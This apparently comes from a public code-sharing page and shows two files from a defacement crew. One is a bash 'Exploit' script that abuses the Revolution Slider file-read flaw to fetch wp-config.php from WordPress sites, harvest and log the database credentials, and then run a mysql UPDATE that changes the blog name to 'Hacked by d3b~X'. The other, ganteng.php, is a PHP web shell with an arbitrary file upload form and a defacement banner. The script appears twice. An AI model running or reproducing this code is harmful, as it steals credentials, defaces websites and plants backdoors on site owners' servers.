eltondev · December 24, 2016 06:28
diff --git a/Exploit b/Exploit
 #!/bin/bash
 echo $1 | grep "http" >/dev/null;chx=$?
 if [ $chx -eq 0 ];then
   hostx=$1
   else
   hostx="http://$1"
 fi
 echo "Scan $hostx"
 
 FCK="rev"
 CekDFC(){
 curl --silent --max-time 10 --connect-timeout 10 "${1}" -o tmp/${FCK}gck.txt
  if [ -f tmp/${FCK}gck.txt ];then
    cat tmp/${FCK}gck.txt | grep -i "Hacked by d3b" >/dev/null;gck=$?
    if [ $gck -eq 0 ];then
     echo " + Exploit success"
    fi
  fi
 }
 
 rm -f xx.txt
 curl --silent --max-time 10 --connect-timeout 10 "${hostx}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php" -o xx.txt
 filex="xx.txt"
 if [ ! -f $filex ];then
 exit
 fi
 DN=$(cat $filex | grep "DB_NAME" | cut -d "'" -f 4)
 DU=$(cat $filex | grep "DB_USER" | cut -d "'" -f 4)
 DP=$(cat $filex | grep "DB_PASSWORD" | cut -d  "'" -f 4)
 DH=$(cat $filex | grep "DB_HOST" | cut -d "'" -f 4)
 PRF=$(cat $filex | grep "table_prefix" | cut -d "'" -f 2)
 
 fip=$(echo $hostx | cut -d '/' -f 3)
 ipx=$(host $fip | awk '/has address/ { print $4 }')
 
 echo "$DH" | grep "localhost\|127.0.0.1" >/dev/null;ch=$?
 if [ $ch -eq 1 ];then
  hostz=$DH
   else
  hostz=$ipx
 fi
 #echo $hostx
 CMN="UPDATE \`${PRF}options\` SET \`option_value\`=\"Hacked by d3b~X\" WHERE \`option_name\`=\"blogname\""
 #echo $CMN
 
 if [ ! -z $DN ];then
 echo "Db        = $DN"
 echo "Host      = $hostz"
 echo "User      = $DU"
 echo "Pass      = $DP"
 echo $hostx >> log.txt
 echo "Db        = $DN" >> log.txt
 echo "Host      = $hostz" >> log.txt
 echo "User      = $DU" >> log.txt
 echo "Pass      = $DP" >> log.txt
 echo "Pref      = $PRF" >> log.txt
 echo "====================================" >> log.txt
 echo "................ Deface"
 mysql -h $DH -D $DN -u $DU -p${DP} -e "$CMN" >/dev/null 2>error.txt
 CekDFC $hostx 1
 fi
diff --git a/ganteng.php b/ganteng.php
 <?php if(isset($_GET["evmym"])){echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";echo "<br>";print "\n";if(@ini_get("disable_functions")){echo "DisablePHP=".@ini_get("disable_functions");}else{ echo "Disable PHP = NONE";}echo "<br>";print "\n";if(@ini_get("safe_mode")){echo "Safe Mode = ON";}else{ echo "Safe Mode = OFF";} echo "<br>";print "\n";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}?><?php echo "<!-- qsbO7OA= -->";echo "<br>";?><title>Hacked by d3b~X</title><center><div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php <style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}<!-- <?php echo md5(deb) ?> -->
	#!/bin/bash
	echo $1 \| grep "http" >/dev/null;chx=$?
	if [ $chx -eq 0 ];then
	hostx=$1
	else
	hostx="http://$1"
	fi
	echo "Scan $hostx"

	FCK="rev"
	CekDFC(){
	curl --silent --max-time 10 --connect-timeout 10 "${1}" -o tmp/${FCK}gck.txt
	if [ -f tmp/${FCK}gck.txt ];then
	cat tmp/${FCK}gck.txt \| grep -i "Hacked by d3b" >/dev/null;gck=$?
	if [ $gck -eq 0 ];then
	echo " + Exploit success"
	fi
	fi
	}

	rm -f xx.txt
	curl --silent --max-time 10 --connect-timeout 10 "${hostx}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php" -o xx.txt
	filex="xx.txt"
	if [ ! -f $filex ];then
	exit
	fi
	DN=$(cat $filex \| grep "DB_NAME" \| cut -d "'" -f 4)
	DU=$(cat $filex \| grep "DB_USER" \| cut -d "'" -f 4)
	DP=$(cat $filex \| grep "DB_PASSWORD" \| cut -d "'" -f 4)
	DH=$(cat $filex \| grep "DB_HOST" \| cut -d "'" -f 4)
	PRF=$(cat $filex \| grep "table_prefix" \| cut -d "'" -f 2)

	fip=$(echo $hostx \| cut -d '/' -f 3)
	ipx=$(host $fip \| awk '/has address/ { print $4 }')

	echo "$DH" \| grep "localhost\\|127.0.0.1" >/dev/null;ch=$?
	if [ $ch -eq 1 ];then
	hostz=$DH
	else
	hostz=$ipx
	fi
	#echo $hostx
	CMN="UPDATE \`${PRF}options\` SET \`option_value\`=\"Hacked by d3b~X\" WHERE \`option_name\`=\"blogname\""
	#echo $CMN

	if [ ! -z $DN ];then
	echo "Db = $DN"
	echo "Host = $hostz"
	echo "User = $DU"
	echo "Pass = $DP"
	echo $hostx >> log.txt
	echo "Db = $DN" >> log.txt
	echo "Host = $hostz" >> log.txt
	echo "User = $DU" >> log.txt
	echo "Pass = $DP" >> log.txt
	echo "Pref = $PRF" >> log.txt
	echo "====================================" >> log.txt
	echo "................ Deface"
	mysql -h $DH -D $DN -u $DU -p${DP} -e "$CMN" >/dev/null 2>error.txt
	CekDFC $hostx 1
	fi